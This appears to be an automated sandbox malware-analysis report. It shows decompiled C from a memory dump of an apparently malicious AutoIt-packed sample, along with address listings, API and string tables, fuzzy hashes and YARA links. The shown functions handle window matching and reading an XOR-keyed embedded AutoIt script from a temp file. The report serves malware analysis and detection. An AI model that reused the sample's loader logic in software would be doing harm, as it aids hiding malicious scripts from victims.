                            0x00af832e
                            0x00af8333
                            0x00af8336
                            0x00af833b
                            0x00af8346
                            0x00af8445
                            0x00000000
                            0x00af8364
                            0x00af8376
                            0x00af838c
                            0x00af8394
                            0x00af8396
                            0x00af83b5
                            0x00af83bd
                            0x00af83bf
                            0x00af83de
                            0x00af83e6
                            0x00af83e8
                            0x00af8432
                            0x00af843a
                            0x00af843c
                            0x00af843e
                            0x00000000
                            0x00af843e
                            0x00af83ea
                            0x00af83f2
                            0x00af83f7
                            0x00af83f9
                            0x00000000
                            0x00af83f9
                            0x00af83c1
                            0x00af83c9
                            0x00af83ce
                            0x00af83d0
                            0x00000000
                            0x00af83d0
                            0x00af8398
                            0x00af83a0
                            0x00af83a5
                            0x00af83a7
                            0x00af83fb
                            0x00af83fe
                            0x00af83ff
                            0x00af8409
                            0x00af840e
                            0x00af8411
                            0x00af8417
                            0x00af8420
                            0x00af8425
                            0x00000000
                            0x00af8425
                            0x00af8378
                            0x00af8378
                            0x00af844a
                            0x00af844d
                            0x00af8452
                            0x00af845a
                            0x00af8463
                            0x00af8463
                            0x00af8376
                            0x00af846b
                            0x00af847e

                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000002.00000002.391910612.0000000000A91000.00000020.00020000.sdmp, Offset: 00A90000, based on PE: true
                            • Associated: 00000002.00000002.391904357.0000000000A90000.00000002.00020000.sdmp Download File
                            • Associated: 00000002.00000002.391973257.0000000000B12000.00000002.00020000.sdmp Download File
                            • Associated: 00000002.00000002.391986959.0000000000B20000.00000004.00020000.sdmp Download File
                            • Associated: 00000002.00000002.391994074.0000000000B21000.00000008.00020000.sdmp Download File
                            • Associated: 00000002.00000002.391999716.0000000000B22000.00000004.00020000.sdmp Download File
                            • Associated: 00000002.00000002.392006856.0000000000B37000.00000004.00020000.sdmp Download File
                            • Associated: 00000002.00000002.392012633.0000000000B3B000.00000002.00020000.sdmp Download File
                            Similarity
                            • API ID: __wcsicoll$__wcsnicmp
                            • String ID: ACTIVE$ALL$CLASSNAME=$HANDLE=$LAST$REGEXP=$[ACTIVE$[ALL$[CLASS:$[HANDLE:$[LAST$[REGEXPTITLE:
                            • API String ID: 790654849-1810252412
                            • Opcode ID: 6435d6f27bd991cf57981141c266c0fc418fd051e8eb0575c8ebf1e2804a9dc4
                            • Instruction ID: 5e053b2c96119f501e720def4fa02d6bf0784a109f38534c111a3220aa734950
                            • Opcode Fuzzy Hash: 6435d6f27bd991cf57981141c266c0fc418fd051e8eb0575c8ebf1e2804a9dc4
                            • Instruction Fuzzy Hash: 60314672A44609B6CF20EAE0DE43FEE73E89F55701F500161FE55BB191EF24AE4486B1
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00AFED23, Relevance: 26.7, APIs: 6, Strings: 9, Instructions: 471COMMON
                            Download Yara Rule
                            C-Code - Quality: 78%
                            			E00AFED23(void* __eflags, void* __fp0, signed int* _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, signed int _a20, char _a24, char _a28, char _a32) {
				char _v20;
				char _v24;
				char _v28;
				char _v36;
				char _v40;
				char _v44;
				char _v52;
				char _v56;
				char _v60;
				char _v68;
				intOrPtr _v72;
				intOrPtr _v76;
				struct HWND__* _v80;
				signed int _v84;
				char _v88;
				char _v96;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t157;
				void* _t158;
				signed int _t173;
				short* _t189;
				signed int _t193;
				signed int _t194;
				signed int _t198;
				signed int _t209;
				signed int _t211;
				char* _t214;
				signed int _t215;
				signed int _t218;
				signed int _t220;
				signed int _t222;
				signed int _t223;
				signed int _t224;
				signed int _t225;
				signed int _t227;
				signed int _t228;
				signed int _t229;
				signed int _t231;
				signed int _t232;
				signed int _t233;
				signed int _t234;
				signed int _t242;
				signed int _t243;
				signed int _t245;
				signed int _t246;
				signed int _t247;
				signed int _t249;
				signed int* _t252;
				signed int _t258;
				signed int _t263;
				signed int _t269;
				signed int* _t273;
				signed int _t277;
				intOrPtr* _t343;
				struct HWND__* _t371;
				signed int* _t373;
				signed int _t378;
				void* _t380;
				void* _t381;
				void* _t383;
				void* _t385;
				void* _t387;
				void* _t388;
				void* _t389;
				void* _t390;
				void* _t391;
				void* _t392;
				void* _t393;
				void* _t398;

				_t398 = __fp0;
				_t393 = __eflags;
				_t380 = (_t378 & 0xfffffff8) - 0x54;
				_t158 = E00A9F100(_t157, _a16);
				_t343 = _a4;
				_v72 = _t343 + 0xec;
				E00A9F100(_t158, _t343 + 0xec);
				_t323 = _a8;
				 *((char*)(_t343 + 4)) = _a32;
				 *((char*)(_t343 + 5)) = _a28;
				_v88 = _t343 + 0x14;
				E00A9DE00(_t343 + 0x14, _a8);
				_t361 = _t343 + 0x24;
				_v80 = _t343 + 0x24;
				E00A9DE00(_t343 + 0x24, _a12);
				_v88 = _t343 + 0xbc;
				E00A92390(_t343 + 0xbc, 0xb14e64, _a8, _t343);
				 *(_t343 + 0x10) = _a20;
				 *(_t343 + 0xcc) = 1;
				 *((char*)(_t343 + 0xc)) = 1;
				 *((intOrPtr*)(_t343 + 8)) = 0;
				 *((intOrPtr*)(_t343 + 0xd0)) = 0;
				 *((intOrPtr*)(_t343 + 0xe4)) = 0;
				E00A9BEC0( &_v60, _t393);
				E00A9BEC0( &_v44, _t393);
				_t287 =  &_v28;
				E00A9BEC0( &_v28, _t393);
				_t169 =  *(_t343 + 0x10);
				if( *(_t343 + 0x10) < 0) {
					_t269 = E00AA51DB(_t323, _t169);
					_t380 = _t380 + 4;
					 *(_t343 + 0x10) = _t269;
					 *((char*)(_t343 + 0xc)) = 0;
				}
				_t395 =  *(_t343 + 0x10) - 4;
				if( *(_t343 + 0x10) == 4) {
					E00AF8322(_v88, _t395, _t398, _v88);
					 *(_t343 + 0x10) = 1;
				}
				if(E00AC4A5A(_v88) == 0 || E00AC4A5A(_t361) == 0) {
					_t362 = _v88;
					__eflags =  *((short*)(E00A91C30(0, _v88, __eflags))) - 0x5b;
					_t273 = _a4;
					if(__eflags != 0) {
						L54:
						_t173 = E00AC4A5A( &_v20);
						__eflags = _t173;
						if(_t173 == 0) {
							E00A9DE00(_v88,  &_v20);
						}
						__eflags = _t273[2];
						if(_t273[2] == 0) {
							_t273[2] = 1;
						}
						_t273[2] = _t273[2] | 0x00000004;
						__eflags = _t273[3];
						if(_t273[3] == 0) {
							E00AA0AF0(_v76);
						}
						__eflags = _t273[2] & 0x00000001;
						if((_t273[2] & 0x00000001) != 0) {
							__eflags = _t273[3];
							if(_t273[3] == 0) {
								E00AA0AF0(_v88);
							}
						}
						__eflags = _a24;
						_push(_t273);
						_push(0xaf1059);
						if(_a24 == 0) {
							EnumWindows();
						} else {
							EnumChildWindows(GetDesktopWindow(), ??, ??);
						}
						_t345 = _a16;
						E00A9F100(E00AD56E5(_a16, _v76), _v76);
						__eflags = _t273[0x39] - 1;
						if(_t273[0x39] >= 1) {
							E00ADCD25( *((intOrPtr*)(_t345 + 4)), _t345, _t273,  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t345 + 4)))))));
						}
						E00A92480( &_v24);
						E00A92480( &_v40);
						E00A92480( &_v56);
						return _t273[0x39];
					} else {
						_t189 = E00A91C30(_t273[6] - 1, _t362, __eflags);
						__eflags =  *_t189 - 0x5d;
						if( *_t189 == 0x5d) {
							_v84 = 1;
							_t350 = _t273[6] - 2;
							__eflags = _t273[6] - 2;
							while(1) {
								__eflags = E00AF17A7(_v88, _t398, _v88,  &_v52,  &_v36,  &_v84, _t350);
								if(__eflags == 0) {
									goto L54;
								}
								_t193 = E00AD59E6(__eflags,  &_v52, L"LAST");
								_t381 = _t380 + 8;
								__eflags = _t193;
								if(__eflags != 0) {
									_t194 = E00AD59E6(__eflags,  &_v36, 0xb14e64);
									__eflags = _t194;
									if(_t194 == 0) {
										goto L42;
									} else {
										_t277 =  *_t273;
										__eflags = _t277;
										if(_t277 == 0) {
											goto L46;
										} else {
											_push( &_v80);
											_v80 =  *_t277;
											_push(_a16);
											goto L8;
										}
									}
								} else {
									_t303 =  &_v52;
									_t209 = E00AD59E6(__eflags,  &_v52, L"ACTIVE");
									_t383 = _t381 + 8;
									__eflags = _t209;
									if(__eflags != 0) {
										_t211 = E00AD59E6(__eflags,  &_v36, 0xb14e64);
										__eflags = _t211;
										if(_t211 == 0) {
											goto L42;
										} else {
											_push(GetForegroundWindow());
											goto L49;
										}
									} else {
										_t215 = E00AD59E6(__eflags,  &_v52, L"HANDLE");
										_t385 = _t383 + 8;
										__eflags = _t215;
										if(__eflags != 0) {
											E00AC2C12(__eflags, _v36,  &_v80);
											_t371 = _v80;
											_t218 = IsWindow(_t371);
											__eflags = _t218;
											if(_t218 == 0) {
												L46:
												E00A92480( &_v20);
												E00A92480( &_v36);
												E00A92480( &_v52);
												__eflags = 0;
												return 0;
											} else {
												_push(_t371);
												L49:
												_push(_t273);
												E00ADCD25(_t303, _t350);
												_v88 =  *( *_t273);
												_t214 =  &_v88;
												goto L7;
											}
										} else {
											_t220 = E00AD59E6(__eflags,  &_v52, L"REGEXPTITLE");
											_t380 = _t385 + 8;
											__eflags = _t220;
											if(__eflags == 0) {
												_t222 = E00AD59E6(__eflags,  &_v52, L"CLASS");
												_t380 = _t380 + 8;
												__eflags = _t222;
												if(__eflags == 0) {
													_t223 = E00AD59E6(__eflags,  &_v52, L"REGEXPCLASS");
													_t380 = _t380 + 8;
													__eflags = _t223;
													if(__eflags == 0) {
														_t224 = E00AD59E6(__eflags,  &_v52, "X");
														_t387 = _t380 + 8;
														__eflags = _t224;
														if(__eflags == 0) {
															_t225 = E00AD59E6(__eflags,  &_v52, "Y");
															_t388 = _t387 + 8;
															__eflags = _t225;
															if(__eflags == 0) {
																_t227 = E00AD59E6(__eflags,  &_v52, "W");
																_t389 = _t388 + 8;
																__eflags = _t227;
																if(__eflags == 0) {
																	_t228 = E00AD59E6(__eflags,  &_v52, "H");
																	_t390 = _t389 + 8;
																	__eflags = _t228;
																	if(__eflags == 0) {
																		_t229 = E00AD59E6(__eflags,  &_v52, L"INSTANCE");
																		_t391 = _t390 + 8;
																		__eflags = _t229;
																		if(__eflags == 0) {
																			_t231 = E00AD59E6(__eflags,  &_v52, L"ALL");
																			_t392 = _t391 + 8;
																			__eflags = _t231;
																			if(__eflags == 0) {
																				_t232 = E00AD59E6(__eflags,  &_v52, L"TITLE");
																				_t380 = _t392 + 8;
																				__eflags = _t232;
																				if(__eflags == 0) {
																					_t233 = E00ADCD09(__eflags,  &_v52, 0xb14e64);
																					_t380 = _t380 + 8;
																					__eflags = _t233;
																					if(_t233 == 0) {
																						continue;
																					} else {
																						goto L42;
																					}
																				} else {
																					_t234 = _t273[2];
																					__eflags = _t234 & 0x00000002;
																					if((_t234 & 0x00000002) != 0) {
																						E00A92480( &_v20);
																						E00A92480( &_v36);
																						E00A92480( &_v52);
																						return 0xfffffffc;
																					} else {
																						_t273[2] = _t234 | 0x00000001;
																						E00A9DE00( &_v20,  &_v36);
																						continue;
																					}
																				}
																			} else {
																				_t242 = E00AD59E6(__eflags,  &_v36, 0xb14e64);
																				_t380 = _t392 + 8;
																				__eflags = _t242;
																				if(_t242 == 0) {
																					L42:
																					E00A92480( &_v20);
																					E00A92480( &_v36);
																					_t198 = E00A92480( &_v52) | 0xffffffff;
																					__eflags = _t198;
																					return _t198;
																				} else {
																					_t273[2] = _t273[2] | 0x00000040;
																					continue;
																				}
																			}
																		} else {
																			_t273[2] = _t273[2] | 0x00000020;
																			_push(_v36);
																			_t243 = E00AA30B0();
																			_t380 = _t391 + 4;
																			_t273[0x33] = _t243;
																			continue;
																		}
																	} else {
																		_t273[2] = _t273[2] | 0x00000400;
																		_push(_v36);
																		_t245 = E00AA30B0();
																		_t380 = _t390 + 4;
																		_t273[0x38] = _t245;
																		continue;
																	}
																} else {
																	_t273[2] = _t273[2] | 0x00000200;
																	_push(_v36);
																	_t246 = E00AA30B0();
																	_t380 = _t389 + 4;
																	_t273[0x37] = _t246;
																	continue;
																}
															} else {
																_t273[2] = _t273[2] | 0x00000100;
																_push(_v36);
																_t247 = E00AA30B0();
																_t380 = _t388 + 4;
																_t273[0x36] = _t247;
																continue;
															}
														} else {
															_t273[2] = _t273[2] | 0x00000080;
															_push(_v36);
															_t249 = E00AA30B0();
															_t380 = _t387 + 4;
															_t273[0x35] = _t249;
															continue;
														}
													} else {
														_t273[2] = _t273[2] | 0x00000010;
														_t373 =  &(_t273[0x1e]);
														E00A912B0(_t373);
														_push( &_v36);
														_t314 =  &_v60;
														_push( &_v60);
														goto L19;
													}
												} else {
													_t273[2] = _t273[2] | 0x00000008;
													E00A9DE00(_v80,  &_v36);
													continue;
												}
											} else {
												_t258 = _t273[2];
												__eflags = _t258 & 0x00000001;
												if((_t258 & 0x00000001) != 0) {
													E00A92480( &_v20);
													E00A92480( &_v36);
													E00A92480( &_v52);
													return 0xfffffffd;
												} else {
													_t263 = _t258 | 0x00000002;
													__eflags = _t263;
													_t373 =  &(_t273[0xd]);
													_t273[2] = _t263;
													E00A912B0(_t373);
													_t314 =  &_v36;
													_push( &_v36);
													_push( &_v68);
													L19:
													_push(_t373);
													_t252 = E00AF80F9(_t314, __eflags);
													__eflags =  *_t252;
													if( *_t252 == 0) {
														continue;
													} else {
														E00A92480( &_v20);
														E00A92480( &_v36);
														E00A92480( &_v52);
														return 0xfffffffe;
													}
												}
											}
										}
									}
								}
								goto L69;
							}
						}
						goto L54;
					}
				} else {
					E00ADCD25(_t287, _t343, _t343, GetForegroundWindow());
					_v96 =  *((intOrPtr*)( *_t343));
					_t214 =  &_v96;
					L7:
					_push(_t214);
					_push(_a16);
					L8:
					E00AC198A();
					E00A92480( &_v28);
					E00A92480( &_v44);
					E00A92480( &_v60);
					return 1;
				}
				L69:
			}










































































                            0x00afed23
                            0x00afed23
                            0x00afed29
                            0x00afed32
                            0x00afed37
                            0x00afed40
                            0x00afed44
                            0x00afed49
                            0x00afed56
                            0x00afed59
                            0x00afed5c
                            0x00afed60
                            0x00afed68
                            0x00afed6c
                            0x00afed70
                            0x00afed80
                            0x00afed84
                            0x00afed8e
                            0x00afed95
                            0x00afed9f
                            0x00afeda3
                            0x00afeda6
                            0x00afedac
                            0x00afedb2
                            0x00afedbb
                            0x00afedc0
                            0x00afedc4
                            0x00afedc9
                            0x00afedce
                            0x00afedd1
                            0x00afedd6
                            0x00afedd9
                            0x00afeddc
                            0x00afeddc
                            0x00afeddf
                            0x00afede3
                            0x00afedea
                            0x00afedef
                            0x00afedef
                            0x00afee02
                            0x00afee5a
                            0x00afee65
                            0x00afee69
                            0x00afee6c
                            0x00aff28e
                            0x00aff293
                            0x00aff298
                            0x00aff29a
                            0x00aff2a5
                            0x00aff2a5
                            0x00aff2aa
                            0x00aff2ae
                            0x00aff2b0
                            0x00aff2b0
                            0x00aff2b7
                            0x00aff2bb
                            0x00aff2bf
                            0x00aff2c5
                            0x00aff2c5
                            0x00aff2ca
                            0x00aff2ce
                            0x00aff2d0
                            0x00aff2d4
                            0x00aff2da
                            0x00aff2da
                            0x00aff2d4
                            0x00aff2df
                            0x00aff2e3
                            0x00aff2e4
                            0x00aff2e9
                            0x00aff2fa
                            0x00aff2eb
                            0x00aff2f2
                            0x00aff2f2
                            0x00aff304
                            0x00aff30e
                            0x00aff313
                            0x00aff31a
                            0x00aff325
                            0x00aff325
                            0x00aff334
                            0x00aff33d
                            0x00aff346
                            0x00aff353
                            0x00afee72
                            0x00afee78
                            0x00afee7d
                            0x00afee81
                            0x00afee8a
                            0x00afee92
                            0x00afee92
                            0x00afee95
                            0x00afeeaf
                            0x00afeeb1
                            0x00000000
                            0x00000000
                            0x00afeec1
                            0x00afeec6
                            0x00afeec9
                            0x00afeecb
                            0x00aff194
                            0x00aff19c
                            0x00aff19e
                            0x00000000
                            0x00aff1a0
                            0x00aff1a0
                            0x00aff1a2
                            0x00aff1a4
                            0x00000000
                            0x00aff1a6
                            0x00aff1af
                            0x00aff1b0
                            0x00aff1b4
                            0x00000000
                            0x00aff1b4
                            0x00aff1a4
                            0x00afeed1
                            0x00afeed1
                            0x00afeedb
                            0x00afeee0
                            0x00afeee3
                            0x00afeee5
                            0x00aff1ea
                            0x00aff1f2
                            0x00aff1f4
                            0x00000000
                            0x00aff1fa
                            0x00aff200
                            0x00000000
                            0x00aff200
                            0x00afeeeb
                            0x00afeef5
                            0x00afeefa
                            0x00afeefd
                            0x00afeeff
                            0x00aff222
                            0x00aff227
                            0x00aff22f
                            0x00aff235
                            0x00aff237
                            0x00aff1ba
                            0x00aff1be
                            0x00aff1c7
                            0x00aff1d0
                            0x00aff1d5
                            0x00aff1dd
                            0x00aff239
                            0x00aff239
                            0x00aff201
                            0x00aff201
                            0x00aff202
                            0x00aff20b
                            0x00aff20f
                            0x00000000
                            0x00aff20f
                            0x00afef05
                            0x00afef0f
                            0x00afef14
                            0x00afef17
                            0x00afef19
                            0x00afef80
                            0x00afef85
                            0x00afef88
                            0x00afef8a
                            0x00afefad
                            0x00afefb2
                            0x00afefb5
                            0x00afefb7
                            0x00afefde
                            0x00afefe3
                            0x00afefe6
                            0x00afefe8
                            0x00aff013
                            0x00aff018
                            0x00aff01b
                            0x00aff01d
                            0x00aff048
                            0x00aff04d
                            0x00aff050
                            0x00aff052
                            0x00aff07d
                            0x00aff082
                            0x00aff085
                            0x00aff087
                            0x00aff0b2
                            0x00aff0b7
                            0x00aff0ba
                            0x00aff0bc
                            0x00aff0e4
                            0x00aff0e9
                            0x00aff0ec
                            0x00aff0ee
                            0x00aff119
                            0x00aff11e
                            0x00aff121
                            0x00aff123
                            0x00aff153
                            0x00aff158
                            0x00aff15b
                            0x00aff15d
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00aff125
                            0x00aff125
                            0x00aff128
                            0x00aff12a
                            0x00aff269
                            0x00aff272
                            0x00aff27b
                            0x00aff28b
                            0x00aff130
                            0x00aff133
                            0x00aff13f
                            0x00000000
                            0x00aff13f
                            0x00aff12a
                            0x00aff0f0
                            0x00aff0fa
                            0x00aff0ff
                            0x00aff102
                            0x00aff104
                            0x00aff163
                            0x00aff167
                            0x00aff170
                            0x00aff17e
                            0x00aff17e
                            0x00aff187
                            0x00aff106
                            0x00aff106
                            0x00000000
                            0x00aff106
                            0x00aff104
                            0x00aff0be
                            0x00aff0c2
                            0x00aff0c6
                            0x00aff0c7
                            0x00aff0cc
                            0x00aff0cf
                            0x00000000
                            0x00aff0cf
                            0x00aff089
                            0x00aff08d
                            0x00aff094
                            0x00aff095
                            0x00aff09a
                            0x00aff09d
                            0x00000000
                            0x00aff09d
                            0x00aff054
                            0x00aff058
                            0x00aff05f
                            0x00aff060
                            0x00aff065
                            0x00aff068
                            0x00000000
                            0x00aff068
                            0x00aff01f
                            0x00aff023
                            0x00aff02a
                            0x00aff02b
                            0x00aff030
                            0x00aff033
                            0x00000000
                            0x00aff033
                            0x00afefea
                            0x00afefee
                            0x00afeff5
                            0x00afeff6
                            0x00afeffb
                            0x00afeffe
                            0x00000000
                            0x00afeffe
                            0x00afefb9
                            0x00afefb9
                            0x00afefbd
                            0x00afefc0
                            0x00afefc9
                            0x00afefca
                            0x00afefce
                            0x00000000
                            0x00afefce
                            0x00afef8c
                            0x00afef90
                            0x00afef99
                            0x00000000
                            0x00afef99
                            0x00afef1b
                            0x00afef1b
                            0x00afef1e
                            0x00afef20
                            0x00aff240
                            0x00aff249
                            0x00aff252
                            0x00aff262
                            0x00afef26
                            0x00afef26
                            0x00afef26
                            0x00afef29
                            0x00afef2c
                            0x00afef2f
                            0x00afef34
                            0x00afef38
                            0x00afef3d
                            0x00afef3e
                            0x00afef3e
                            0x00afef3f
                            0x00afef44
                            0x00afef47
                            0x00000000
                            0x00afef4d
                            0x00afef51
                            0x00afef5a
                            0x00afef63
                            0x00afef73
                            0x00afef73
                            0x00afef47
                            0x00afef20
                            0x00afef19
                            0x00afeeff
                            0x00afeee5
                            0x00000000
                            0x00afeecb
                            0x00afee95
                            0x00000000
                            0x00afee81
                            0x00afee0e
                            0x00afee16
                            0x00afee1f
                            0x00afee23
                            0x00afee27
                            0x00afee2a
                            0x00afee2b
                            0x00afee2c
                            0x00afee2c
                            0x00afee35
                            0x00afee3e
                            0x00afee47
                            0x00afee57
                            0x00afee57
                            0x00000000

                            APIs
                              • Part of subcall function 00A92390: _wcslen.LIBCMT ref: 00A9239D
                              • Part of subcall function 00A92390: _memmove.LIBCMT ref: 00A923C3
                            • GetForegroundWindow.USER32(?,?,?,?,?,?,?), ref: 00AFEE0E
                            • GetForegroundWindow.USER32(?,?,?,?,?,?), ref: 00AFF1FA
                            • IsWindow.USER32(?), ref: 00AFF22F
                            • GetDesktopWindow.USER32 ref: 00AFF2EB
                            • EnumChildWindows.USER32 ref: 00AFF2F2
                            • EnumWindows.USER32(00AF1059,?), ref: 00AFF2FA
                              • Part of subcall function 00AD59E6: _wcslen.LIBCMT ref: 00AD59F6
                            Strings
                            Memory Dump Source
                            • Source File: 00000002.00000002.391910612.0000000000A91000.00000020.00020000.sdmp, Offset: 00A90000, based on PE: true
                            • Associated: 00000002.00000002.391904357.0000000000A90000.00000002.00020000.sdmp Download File
                            • Associated: 00000002.00000002.391973257.0000000000B12000.00000002.00020000.sdmp Download File
                            • Associated: 00000002.00000002.391986959.0000000000B20000.00000004.00020000.sdmp Download File
                            • Associated: 00000002.00000002.391994074.0000000000B21000.00000008.00020000.sdmp Download File
                            • Associated: 00000002.00000002.391999716.0000000000B22000.00000004.00020000.sdmp Download File
                            • Associated: 00000002.00000002.392006856.0000000000B37000.00000004.00020000.sdmp Download File
                            • Associated: 00000002.00000002.392012633.0000000000B3B000.00000002.00020000.sdmp Download File
                            Similarity
                            • API ID: Window$EnumForegroundWindows_wcslen$ChildDesktop_memmove
                            • String ID: ACTIVE$ALL$CLASS$HANDLE$INSTANCE$LAST$REGEXPCLASS$REGEXPTITLE$TITLE
                            • API String ID: 329138477-1919597938
                            • Opcode ID: 59c894a491b768478c1beedf736e6a388992f4c65e4f3b7f9cbaf5ba158a4504
                            • Instruction ID: 2614b35471aa18a4a06aa6a4d0e70423e9e068ec4e0babe96391cb6fdd3f376d
                            • Opcode Fuzzy Hash: 59c894a491b768478c1beedf736e6a388992f4c65e4f3b7f9cbaf5ba158a4504
                            • Instruction Fuzzy Hash: 63F1E572514305AFCB10EFA0D982AAEB3F4BF95304F44456DFA455B252EB31ED08CBA2
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00AE2833, Relevance: 26.4, APIs: 13, Strings: 2, Instructions: 172COMMON
                            Download Yara Rule
                            C-Code - Quality: 88%
                            			E00AE2833(void* __eflags, signed int _a4, intOrPtr* _a8, signed int* _a12, char _a15) {
				char _v12;
				char _v16;
				signed int _v20;
				short _v44;
				short _v594;
				short _v1116;
				short _v1120;
				short _v1124;
				short _v1128;
				short _v1132;
				short _v1136;
				short _v1140;
				short _v1144;
				short _v1148;
				char _v1152;
				char _v1680;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int* _t87;
				intOrPtr _t88;
				void* _t108;
				intOrPtr* _t111;

				_t87 = _a12;
				_t111 = _a4;
				_push(0);
				_v1152 = 0;
				_v1148 = 0;
				_v1144 = 0;
				_v1140 = 0;
				_v1136 = 0;
				_v1132 = 0;
				_v1128 = 0;
				_v1124 = 0;
				_v1120 = 0;
				_v44 = 0;
				_t13 = _t111 + 4; // 0xb38614
				_v1116 = 0;
				_push( *_t13);
				_push( *_t111);
				_v594 = 0;
				_v16 = 1;
				E00AA4FF1(_t87, 0, _t108, _t111, __eflags);
				if(E00AE268F(__eflags, _t111, L">>>AUTOIT SCRIPT<<<",  &_v1680) == 0) {
					E00AA4C24( &_a15, 1, 1,  *_t111);
					E00AA4C24( &_a4, 4, 1,  *_t111);
					_t110 = _a4 ^ 0x000087bc;
					E00AA4C24( &_a4, 4, 1,  *_t111);
					 *_t87 = _a4 ^ 0x000087bc;
					E00AA4C24( &_a4, 4, 1,  *_t111);
					_push(1);
					_v20 = _a4 ^ 0x0000a685;
					_push(0x10);
					_push( *_t111);
					E00AA4FF1(_t87,  &_a4, _a4 ^ 0x000087bc, _t111, __eflags);
					_v12 = E00AA34DB( &_a4, _a4 ^ 0x000087bc, _t111,  *_t87);
					_t88 = E00AA34DB( &_a4, _a4 ^ 0x000087bc, _t111, _a4 ^ 0x000087bc);
					E00AA4C24(_t88, _t110, 1,  *_t111);
					_t27 = _t111 + 8; // 0x0
					E00ADAF66( *_t87, __eflags, _t88, _t110,  *_t27 + 0x2477);
					E00AC21FA( &_v16, _t88, _t110);
					__eflags = _v20 - _v16;
					if(_v20 == _v16) {
						__eflags = _a15 - 1;
						if(_a15 != 1) {
							E00AA3668(_v12);
							_v12 = _t88;
						} else {
							_v1144 = 0;
							_v1140 = 0;
							_v1136 = 0;
							_v1124 = 0;
							_v1120 = 0;
							_v44 = 0;
							_v1116 = 0;
							_v1132 = 1;
							_v1128 = 1;
							_v594 = 0;
							_v1148 = _t88;
							_v1152 = _v12;
							E00ADB120(0, _t110,  &_v1152);
							E00AA3668(_t88);
						}
						 *_a8 = _v12;
						__eflags = 0;
						return 0;
					} else {
						E00AA3668(_v12);
						E00AA3668(_t88);
						return 0xa;
					}
				} else {
					return 6;
				}
			}



























                            0x00ae283f
                            0x00ae2843
                            0x00ae2847
                            0x00ae284a
                            0x00ae2850
                            0x00ae2856
                            0x00ae285c
                            0x00ae2862
                            0x00ae2868
                            0x00ae286e
                            0x00ae2874
                            0x00ae287a
                            0x00ae2880
                            0x00ae2883
                            0x00ae2886
                            0x00ae288f
                            0x00ae2892
                            0x00ae2893
                            0x00ae289a
                            0x00ae28a1
                            0x00ae28bd
                            0x00ae28d8
                            0x00ae28e8
                            0x00ae28fb
                            0x00ae2901
                            0x00ae2919
                            0x00ae291b
                            0x00ae292b
                            0x00ae292d
                            0x00ae2932
                            0x00ae2934
                            0x00ae2935
                            0x00ae2949
                            0x00ae2959
                            0x00ae295d
                            0x00ae2962
                            0x00ae2970
                            0x00ae297b
                            0x00ae2983
                            0x00ae2986
                            0x00ae29ab
                            0x00ae29af
                            0x00ae2a1e
                            0x00ae2a23
                            0x00ae29b1
                            0x00ae29b3
                            0x00ae29b9
                            0x00ae29bf
                            0x00ae29c5
                            0x00ae29cb
                            0x00ae29d3
                            0x00ae29db
                            0x00ae29e2
                            0x00ae29e8
                            0x00ae29fa
                            0x00ae2a01
                            0x00ae2a07
                            0x00ae2a0d
                            0x00ae2a13
                            0x00ae2a13
                            0x00ae2a31
                            0x00ae2a33
                            0x00ae2a39
                            0x00ae2988
                            0x00ae298c
                            0x00ae2995
                            0x00ae29a8
                            0x00ae29a8
                            0x00ae28bf
                            0x00ae28ca
                            0x00ae28ca

                            APIs
                            • _fseek.LIBCMT ref: 00AE28A1
                              • Part of subcall function 00AE268F: __fread_nolock.LIBCMT ref: 00AE26B4
                              • Part of subcall function 00AE268F: __fread_nolock.LIBCMT ref: 00AE26F6
                              • Part of subcall function 00AE268F: __fread_nolock.LIBCMT ref: 00AE2714
                              • Part of subcall function 00AE268F: _wcscpy.LIBCMT ref: 00AE2748
                              • Part of subcall function 00AE268F: __fread_nolock.LIBCMT ref: 00AE2758
                              • Part of subcall function 00AE268F: __fread_nolock.LIBCMT ref: 00AE2776
                              • Part of subcall function 00AE268F: _wcscpy.LIBCMT ref: 00AE27A7
                            • __fread_nolock.LIBCMT ref: 00AE28D8
                            • __fread_nolock.LIBCMT ref: 00AE28E8
                            • __fread_nolock.LIBCMT ref: 00AE2901
                            • __fread_nolock.LIBCMT ref: 00AE291B
                            • _fseek.LIBCMT ref: 00AE2935
                            • _malloc.LIBCMT ref: 00AE2940
                            • _malloc.LIBCMT ref: 00AE294C
                            • __fread_nolock.LIBCMT ref: 00AE295D
                            • _free.LIBCMT ref: 00AE298C
                            • _free.LIBCMT ref: 00AE2995
                            Strings
                            • C:\Users\user\AppData\Local\Temp\82139548\rpgc.htg, xrefs: 00AE2842
                            • >>>AUTOIT SCRIPT<<<, xrefs: 00AE28B0
                            Memory Dump Source
                            • Source File: 00000002.00000002.391910612.0000000000A91000.00000020.00020000.sdmp, Offset: 00A90000, based on PE: true
                            • Associated: 00000002.00000002.391904357.0000000000A90000.00000002.00020000.sdmp Download File
                            • Associated: 00000002.00000002.391973257.0000000000B12000.00000002.00020000.sdmp Download File
                            • Associated: 00000002.00000002.391986959.0000000000B20000.00000004.00020000.sdmp Download File
                            • Associated: 00000002.00000002.391994074.0000000000B21000.00000008.00020000.sdmp Download File
                            • Associated: 00000002.00000002.391999716.0000000000B22000.00000004.00020000.sdmp Download File
                            • Associated: 00000002.00000002.392006856.0000000000B37000.00000004.00020000.sdmp Download File
                            • Associated: 00000002.00000002.392012633.0000000000B3B000.00000002.00020000.sdmp Download File
                            Similarity
                            • API ID: __fread_nolock$_free_fseek_malloc_wcscpy
                            • String ID: >>>AUTOIT SCRIPT<<<$C:\Users\user\AppData\Local\Temp\82139548\rpgc.htg
                            • API String ID: 1255752989-39919283
                            • Opcode ID: 119574cee4d6a17d428c0b2f8ed24eb28d9ebfa1f803aae79f73f007fbc1515e
                            • Instruction ID: f5a6efb6d385baa8c1d0b5ff5a4e5a5a6ddd56493c55a5d5aacf640b70d0649b
                            • Opcode Fuzzy Hash: 119574cee4d6a17d428c0b2f8ed24eb28d9ebfa1f803aae79f73f007fbc1515e
                            • Instruction Fuzzy Hash: BF5110F1900218AFDB20DF69DD81B9AB7B8EF89310F1045A9F64DE7241E7719A80CF55
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00AC41CD, Relevance: 26.3, APIs: 10, Strings: 5, Instructions: 91windowCOMMON
                            Download Yara Rule
